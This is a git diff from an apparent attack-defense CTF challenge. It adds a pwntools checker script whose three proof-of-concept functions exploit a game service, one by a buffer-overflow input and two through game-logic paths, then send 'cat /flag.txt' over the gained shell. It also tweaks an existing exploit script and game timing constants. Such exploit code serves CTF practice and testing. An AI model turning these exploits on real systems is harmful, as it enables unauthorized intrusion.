diff --git a/checker.py b/checker.py new file mode 100644 index 0000000..25fe214 --- /dev/null +++ b/checker.py @@ -0,0 +1,101 @@ +#! /usr/bin/env python2 +from pwn import process, remote + +HOST = "192.168.2.20" +TOTAL_TEAMS = 10 +FORMAT = "SlashRootCTF" + + +def run(): + # return process(FILENAME) + return remote("127.0.0.1", 60204) + + +def poc0(host, port): + p = remote(host, port) + p.recvuntil(">") + p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) + if "young" in p.recvuntil(">"): + p.sendline("y") + p.recvuntil(">") + p.sendline("2") + p.recvuntil(">") + p.sendline("4") + p.recvuntil(">") + p.sendline("y") + for _ in xrange(10): + p.recvuntil(">") + p.sendline("99") + p.sendline("cat /flag.txt") + flag = p.recv(46) + if FORMAT in flag: + return True + else: + return False + else: + return False + + +def poc1(host, port): + p = remote(host, port) + p.recvuntil(">") + p.sendline("Leo") + p.recvuntil(">") + p.sendline("y") + for _ in range(2): + p.recvuntil(">") + p.sendline("3") + p.recvuntil(">") + p.sendline("0") + if "Who" in p.recvuntil(">"): + return False + p.sendline("y") + p.recvuntil(">") + p.sendline("1") + p.recvuntil(">") + p.sendline("4") + p.recvuntil(">") + p.sendline("y") + for _ in range(10): + p.recvuntil(">") + p.sendline("99") + p.sendline("cat /flag.txt") + flag = p.recv(46) + if FORMAT in flag: + return True + else: + return False + + +def poc2(host, port): + p = remote(host, port) + p.recvuntil(">") + p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") + p.recvuntil(">") + p.sendline("y") + p.recvuntil(">") + p.sendline("6") + if "Lv: 1000000" in p.recvuntil(">"): + p.sendline("2") + p.recvuntil(">") + p.sendline("4") + p.recvuntil(">") + p.sendline("y") + for _ in xrange(10): + p.recvuntil(">") + p.sendline("99") + p.sendline("cat /flag.txt") + flag = p.recv(46) + if FORMAT in flag: + return True + else: + return False + else: + return False + + +if __name__ == "__main__": + for i in range(1): + print poc0(HOST, (60004 + (i*100))) + print poc1(HOST, (60004 + (i*100))) + print poc2(HOST, (60004 + (i*100))) diff --git a/lib/UserInterface.cpp b/lib/UserInterface.cpp index a8ad00c..f1776fe 100644 --- a/lib/UserInterface.cpp +++ b/lib/UserInterface.cpp @@ -1,7 +1,7 @@ #include "UserInterface.hpp" -const int UserInterface::INTERVAL = 100; -const int UserInterface::MINI_INTERVAL = 50; +const int UserInterface::INTERVAL = 0; +const int UserInterface::MINI_INTERVAL = 0; const int UserInterface::MAX_DAY = 28; const int UserInterface::MAX_MONTH = 12; const int UserInterface::MAX_YEAR = 100; @@ -225,4 +225,4 @@ void UserInterface::characterInfo(Character &c) << "\n Xp: " << c.getExperience() << "\n next: " << c.toNextLevel() << "\n++++++++++++++++++++++++" << std::endl; -} \ No newline at end of file +} diff --git a/poc.py b/poc.py index e8bf076..2fbe954 100644 --- a/poc.py +++ b/poc.py @@ -4,7 +4,7 @@ FILENAME = "./spell-warz-again-final" def run(): # return process(FILENAME) - return remote("103.200.7.150", 60104) + return remote("127.0.0.1", 60204) def poc0(): p = run() @@ -52,7 +52,7 @@ def poc1(): def poc2(): p = run() print p.recvuntil(">") - p.sendline("__th3_w0rLd_D3str0Y3r__") + p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") print p.recvuntil(">") p.sendline("y") print p.recvuntil(">") diff --git a/spell-warz-again-final b/spell-warz-again-final new file mode 100755 index 0000000..4843900 Binary files /dev/null and b/spell-warz-again-final differ diff --git a/spell-warz-again-final-patched b/spell-warz-again-final-patched new file mode 100755 index 0000000..cdfa517 Binary files /dev/null and b/spell-warz-again-final-patched differ